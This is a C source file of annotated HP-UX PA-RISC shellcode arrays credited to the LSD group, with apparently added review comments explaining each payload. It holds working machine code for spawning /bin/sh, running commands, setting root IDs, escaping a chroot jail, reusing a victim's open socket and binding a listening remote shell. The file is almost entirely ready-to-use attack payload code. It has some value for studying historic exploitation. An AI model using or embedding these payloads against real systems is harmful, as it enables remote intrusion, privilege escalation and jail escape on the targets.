/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for hp-ux 10.20 parisc                                         #*/

/*
syscall     %r22 %r26,%r25,%r24,%r23
----------- ---- ---------------------------------------------------------------
execv       x00b ->path="/bin/sh",0
execv       x00b ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
setresuid   x07e 0,0,0
mkdir       x088 ->path="a..",mode= (each value is valid)
chroot      x03d ->path={"a..","."}
chdir       x00c ->path=".."
getpeername x116 sfd,->sadr=[],->[0x10]
socket      x122 AF_INET=2,SOCK_STREAM=1,prot=0
bind        x114 sfd,->sadr=[0x61,2,hi,lo,0,0,0,0],len=0x10
listen      x119 sfd,backlog=5
accept      x113 sfd,0,0
dup2        x05a sfd,fd={0,1,2}
*/

#if defined(PARISC) && defined(HPUX)

/*
 * shellcode: execv("/bin/sh", 0) — syscall 0x00b in the table above.
 * Layout: 7 instructions, then the inline "/bin/sh" string (7 chars + NUL = 8 bytes).
 * The leading `bl` uses %r26 as its link register so %r26 holds an address inside
 * this array; the following `addi` moves it onto the trailing string (exact
 * offset arithmetic is the author's, not re-verified here), %r25 (argv) is zeroed,
 * and `stbs %r0,7(%r26)` re-terminates the path.  The ldil/ble pair on the
 * 0xc0000004 gateway is the HP-UX syscall entry; the `addi,>` after `ble`
 * executes in the branch delay slot and supplies the syscall number in %r22.
 * That constant gateway sequence recurs in every array in this file.
 */
char shellcode[]=          /* 7*4+8 bytes                    */
    "\xeb\x5f\x1f\xfd"     /* bl      <shellcode+4>,%r26     */
    "\x0b\x39\x02\x99"     /* xor     %r25,%r25,%r25         */
    "\xb7\x5a\x40\x22"     /* addi,<  0x11,%r26,%r26         */
    "\x0f\x40\x12\x0e"     /* stbs    %r0,7(%r26)            */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x70\x16"     /* addi,>  0xb,%r0,%r22   (syscall number, delay slot) */
    "/bin/sh"              /* NUL-terminated by the literal itself */
;

/*
 * cmdshellcode: execv("/bin/sh", ["/bin/sh", "-c", cmd, 0]) — syscall 0x00b.
 * Layout: 14 instructions, the 12-byte prefix "/bin/sh -c  ", then the command,
 * which the user of this array appends after the prefix (hence "+cmdlen").
 * %r26 is pointed at the prefix; %r22 = prefix+8 ("-c") and %r21 = prefix+12
 * (the appended command).  The two `stbs %r0` writes overwrite the spaces at
 * prefix offsets 7 and 10 with NUL, splitting the one literal into three
 * C strings in place.  The four `stw` instructions then lay out argv
 * (path, "-c", cmd, 0) at -0x34..-0x28 below %r26 and %r25 is set to its start.
 */
char cmdshellcode[]=       /* 14*4+12+cmdlen bytes           */
    "\xeb\x5f\x1f\xfd"     /* bl      <cmdshellcode+4>,%r26  */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xb7\x5a\x40\x5a"     /* addi,<  0x2d,%r26,%r26         */
    "\xb7\x56\x40\x10"     /* addi,<  0x8,%r26,%r22   -> "-c" */
    "\xb7\x55\x40\x18"     /* addi,<  0xc,%r26,%r21   -> cmd  */
    "\x0f\x40\x12\x0e"     /* stbs    %r0,0x7(%r26)   NUL after "/bin/sh" */
    "\x0f\x40\x12\x14"     /* stbs    %r0,0xa(%r26)   NUL after "-c"      */
    "\x6b\x5a\x3f\x99"     /* stw     %r26,-0x34(%r26)  argv[0] */
    "\x6b\x56\x3f\xa1"     /* stw     %r22,-0x30(%r26)  argv[1] */
    "\x6b\x55\x3f\xa9"     /* stw     %r21,-0x2c(%r26)  argv[2] */
    "\x6b\x40\x3f\xb1"     /* stw     %r0, -0x28(%r26)  argv[3] = 0 */
    "\xb7\x59\x47\x99"     /* addi,<  -0x34,%r26,%r25   %r25 = argv */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x70\x16"     /* addi,>  0x0b,%r0,%r22   (syscall number, delay slot) */
    "/bin/sh -c  "         /* 12-byte prefix; offsets 7 and 10 are patched to NUL above */
    /* command: appended here by the caller, NUL-terminated */
;

/*
 * setresuidcode: setresuid(0, 0, 0) — syscall 0x07e.  Zeroes the three
 * argument registers %r26..%r24 and enters the gateway; no data follows.
 */
char setresuidcode[]=      /* 6*4 bytes                      */
     "\x0b\x5a\x02\x9a"    /* xor     %r26,%r26,%r26         */
     "\x0b\x39\x02\x99"    /* xor     %r25,%r25,%r25         */
     "\x0b\x18\x02\x98"    /* xor     %r24,%r24,%r24         */
     "\x20\x20\x08\x01"    /* ldil    L%0xc0000004,%r1       */
     "\xe4\x20\xe0\x08"    /* ble     R%0xc0000004(%sr7,%r1) */
     "\xb4\x16\x70\xfc"    /* addi,>  0x7e,%r0,%r22   (syscall number, delay slot) */
;

/*
 * chrootcode: mkdir("a..") / chroot("a..") / chdir("..") repeated / chroot(".")
 * — syscalls 0x088, 0x03d, 0x00c, 0x03d per the table above.
 * The inline data word "a..." is re-terminated by `stbs %r0,0x3(%r12)` so that
 * %r12+0 = "a..", %r12+1 = "..", %r12+2 = "." (see the three addi,< on %r12).
 * The chdir("..") call is repeated under a %r13 countdown starting at 0xff.
 * NOTE(review): the first six words (blr,n / ldil / ble / xor / bv,n 0(%rp))
 * appear to form a small syscall stub that the later `bl <chrootcode+4>,%rp`
 * sites call into, with %r22 again loaded in the delay slot — not re-traced here.
 */
char chrootcode[]=         /* 24*4 bytes                     */
    "\xb4\x17\x40\x04"     /* addi,<  0x2,%r0,%r23           */
    "\xeb\x57\x40\x02"     /* blr,n   %r23,%r26              */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\x0a\xf7\x02\x97"     /* xor     %r23,%r23,%r23         */
    "\xe8\x40\xc0\x02"     /* bv,n    0(%rp)                 */
    "\x61\x2e\x2e\x2e"     /* a...   (inline path data)      */
    "\xb7\x5a\x40\x12"     /* addi,<  0x9,%r26,%r26          */
    "\x08\x1a\x06\x0c"     /* add     %r26,%r0,%r12          */
    "\x0d\x80\x12\x06"     /* stbs    %r0,0x3(%r12)   -> "a..\0" */
    "\xe8\x5f\x1f\xad"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x71\x10"     /* addi,>  0x88,%r0,%r22   mkdir  */
    "\x08\x0c\x06\x1a"     /* add     %r12,%r0,%r26   "a.."  */
    "\xe8\x5f\x1f\x95"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x70\x7a"     /* addi,>  0x3d,%r0,%r22   chroot */
    "\xb4\x0d\x01\xfe"     /* addi    0xff,%r0,%r13   loop counter */
    "\xb5\x9a\x40\x02"     /* addi,<  0x1,%r12,%r26   ".."   */
    "\xe8\x5f\x1f\x75"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x70\x18"     /* addi,>  0xc,%r0,%r22    chdir  */
    "\x88\x0d\x3f\xdd"     /* combf,= %r13,%r0,<chrootcode+64> */
    "\xb5\xad\x07\xff"     /* addi    -0x1,%r13,%r13         */
    "\xb5\x9a\x40\x04"     /* addi,<  0x2,%r12,%r26   "."    */
    "\xe8\x5f\x1f\x4d"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x70\x7a"     /* addi,>  0x3d,%r0,%r22   chroot */
;

/*
 * findsckcode: locate an existing connected socket by peer port, then
 * dup2() it onto fds 2, 1, 0.
 * %r14 counts file descriptors down from 0xef; for each, getpeername
 * (0x116) is called with the sadr/len scratch area addressed relative to
 * %r12.  The halfword loaded with `ldh 0x110(%r25)` (peer port from the
 * returned sockaddr) is compared against the halfword at -0x11(%r12), which
 * is the "\x12\x34" placeholder in the un-annotated data word below — byte
 * offset 58 of this array, i.e. FINDSCKPORTOFS.  On a match %r15 counts
 * 2,1,0 through dup2 (0x5a).  The branch targets in the comments are the
 * author's annotations and were not re-verified here.
 */
char findsckcode[]=        /* 30*4 bytes                     */
    "\xe9\x9f\x1f\xfd"     /* bl      <findsckcode+4>,%r12   */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\xb4\x0e\x01\xde"     /* addi    0xef,%r0,%r14   fd counter */
    "\xb5\x98\x07\xd3"     /* addi    -0x17,%r12,%r24        */
    "\xb5\x99\x07\xdb"     /* addi    -0x13,%r12,%r25        */
    "\x08\x0e\x06\x1a"     /* add     %r14,%r0,%r26   fd     */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x02\x2c"     /* addi    0x116,%r0,%r22  getpeername */
    "\x80\x1c\x20\x20"     /* comb,=  %ret0,%r0,<findsckcode+60> */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\xb5\xce\x07\xff"     /* addi    -0x1,%r14,%r14         */
    "\x88\x0e\x3f\xad"     /* combf,= %r14,%r0,<findsckcode+12>  */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\x61\x61\x12\x34"     /* data: 2 filler bytes, then port word at FINDSCKPORTOFS (58) */
    "\xb5\x99\x06\x3f"     /* addi    -0xe1,%r12,%r25        */
    "\x47\x2f\x02\x20"     /* ldh     0x110(%r25),%r15  peer port */
    "\x45\x90\x3f\xdf"     /* ldh     -0x11(%r12),%r16  wanted port */
    "\x82\x0f\x20\x10"     /* comb,=  %r15,%r16,<findsckcode+88> */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\x8a\x0f\x3f\x6d"     /* combf,= %r15,%r16,<findsckcode+12> */
    "\xb5\xce\x07\xff"     /* addi    -0x1,%r14,%r14         */
    "\xb4\x0f\x40\x04"     /* addi,<  0x2,%r0,%r15    target fd 2,1,0 */
    "\x08\x0e\x06\x1a"     /* add     %r14,%r0,%r26   sfd    */
    "\x08\x0f\x06\x19"     /* add     %r15,%r0,%r25   newfd  */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x70\xb4"     /* addi,>  0x5a,%r0,%r22   dup2   */
    "\x88\x0f\x3f\xcd"     /* combf,= %r15,%r0,<findsckcode+92> */
    "\xb5\xef\x07\xff"     /* addi    -0x1,%r15,%r15         */
;

/*
 * bindsckcode: socket(AF_INET=2, SOCK_STREAM=1, 0) (0x122), bind(sfd, sadr, 0x10)
 * (0x114), listen(sfd, …) (0x119), accept(sfd, 0, 0) (0x113), then dup2 of the
 * accepted fd onto 2, 1, 0 (0x5a, %r14 counting down from 2).
 * The un-annotated data word below is the start of the sockaddr template from
 * the table (0x61, AF_INET=2, port hi, port lo, …); its port word sits at byte
 * offset 26 of this array, i.e. BINDSCKPORTOFS.  `stw %r0,0x5(%r12)` zeroes
 * four bytes of that template before bind (presumably the address field —
 * verify).  The first six words are the same blr,n/ldil/ble/xor/bv,n stub
 * pattern used in chrootcode, entered through `bl <bindsckcode+4>,%rp`.
 * NOTE(review): the summary table lists backlog=5 for listen, but the code
 * loads 1 into %r25 (`addi,< 0x1,%r0,%r25`) before syscall 0x119 — harmless,
 * but the table and the code disagree.
 */
char bindsckcode[]=        /* 37*4 bytes                     */
    "\xb4\x17\x40\x04"     /* addi,<  0x2,%r0,%r23           */
    "\xe9\x97\x40\x02"     /* blr,n   %r23,%r12              */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\x0a\xf7\x02\x97"     /* xor     %r23,%r23,%r23         */
    "\xe8\x40\xc0\x02"     /* bv,n    0(%rp)                 */
    "\x61\x02\x23\x45"     /* data: 0x61, AF_INET, port word at BINDSCKPORTOFS (26) */
    "\xb4\x1a\x40\x04"     /* addi,<  0x2,%r0,%r26    AF_INET */
    "\xb4\x19\x40\x02"     /* addi,<  0x1,%r0,%r25    SOCK_STREAM */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24  proto 0 */
    "\xe8\x5f\x1f\xad"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x44"     /* addi,>  0x122,%r0,%r22  socket */
    "\x08\x1c\x06\x0d"     /* add     %ret0,%r0,%r13  sfd    */
    "\xb5\x8c\x40\x10"     /* addi,<  0x8,%r12,%r12          */
    "\xb4\x18\x40\x20"     /* addi,<  0x10,%r0,%r24   len    */
    "\x08\x0d\x06\x1a"     /* add     %r13,%r0,%r26   sfd    */
    "\x0d\x80\x12\x8a"     /* stw     %r0,0x5(%r12)          */
    "\xb5\x99\x40\x02"     /* addi,<  0x1,%r12,%r25   sadr   */
    "\xe8\x5f\x1f\x6d"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x28"     /* addi,>  0x114,%r0,%r22  bind   */
    "\x08\x0d\x06\x1a"     /* add     %r13,%r0,%r26   sfd    */
    "\xb4\x19\x40\x02"     /* addi,<  0x1,%r0,%r25    backlog (table says 5) */
    "\xe8\x5f\x1f\x4d"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x32"     /* addi,>  0x119,%r0,%r22  listen */
    "\x08\x0d\x06\x1a"     /* add     %r13,%r0,%r26   sfd    */
    "\x0b\x39\x02\x99"     /* xor     %r25,%r25,%r25         */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\xe8\x5f\x1f\x25"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x26"     /* addi,>  0x113,%r0,%r22  accept */
    "\xb4\x0e\x40\x04"     /* addi,<  0x2,%r0,%r14    target fd 2,1,0 */
    "\x08\x1c\x06\x0c"     /* add     %ret0,%r0,%r12  accepted fd */
    "\x08\x0c\x06\x1a"     /* add     %r12,%r0,%r26          */
    "\x08\x0e\x06\x19"     /* add     %r14,%r0,%r25          */
    "\xe8\x5f\x1e\xf5"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x70\xb4"     /* addi,>  0x5a,%r0,%r22   dup2   */
    "\x88\x0e\x3f\xd5"     /* combf,= %r14,%r0,<bindsckcode+124> */
    "\xb5\xce\x07\xff"     /* addi    -0x1,%r14,%r14         */
;

/*
 * jump: two instructions — branch to the address in %rp, with `copy %sp,%ret0`
 * executing in the delay slot so %ret0 holds the stack pointer on arrival.
 * Not NUL-free: both words end in 0x00 0x00.  How this stub is used is not
 * shown in this file.
 */
char jump[]=
    "\xe0\x40\x00\x00"     /* be      0x0(%sr0,%rp)          */
    "\x37\xdc\x00\x00"     /* copy    %sp,%ret0   (delay slot) */
;

/*
 * Byte offsets of the 16-bit port placeholders inside the arrays above.
 * FINDSCKPORTOFS: findsckcode, the "\x12\x34" in the un-annotated data word
 *   after instruction 14 (14*4 + 2 = 58).
 * BINDSCKPORTOFS: bindsckcode, the "\x23\x45" in the un-annotated data word
 *   after instruction 6 (6*4 + 2 = 26).
 * These must be kept in sync with the arrays if an instruction is inserted
 * before the data word.
 */
#define FINDSCKPORTOFS     58
#define BINDSCKPORTOFS     26

#endif
